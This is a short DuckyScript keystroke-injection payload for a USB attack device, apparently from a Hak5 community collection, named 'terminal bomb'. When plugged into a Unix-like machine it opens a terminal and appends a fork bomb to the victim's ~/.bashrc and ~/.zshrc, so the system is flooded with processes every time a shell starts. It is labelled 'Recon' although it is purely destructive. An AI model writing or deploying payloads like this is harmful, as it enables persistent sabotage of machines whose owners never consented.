REM Title: terminal bomb REM Author: FalsePhilosopher REM Target: Unix-like tested on kubuntu 22.04 REM Props: Hak5, drapl0n for the OG termbomb, the community and memes REM Version: 1.0 REM Category: Recon REM Starts a forkbomb every time they open a terminal, if you want a more elequently written one check out drapl0n's PL as this is just a basic one liner. Simple but effective with less points of failure. REM Lamp oil, rope? Bombs! You want it? It's yours my friend! As long as you have enough Rupees! REM REM initialization delay DELAY 300 REM Minimize all windows as that ensures launch happens smoother. WINDOWS d DELAY 300 CTRL-ALT t DELAY 1500 REM STRING echo ":(){ :|:& };:" >> ~/.zshrc && echo ":(){ :|:& };:" >> ~/.bashrc DELAY 300 ENTER DELAY 500 ALT F4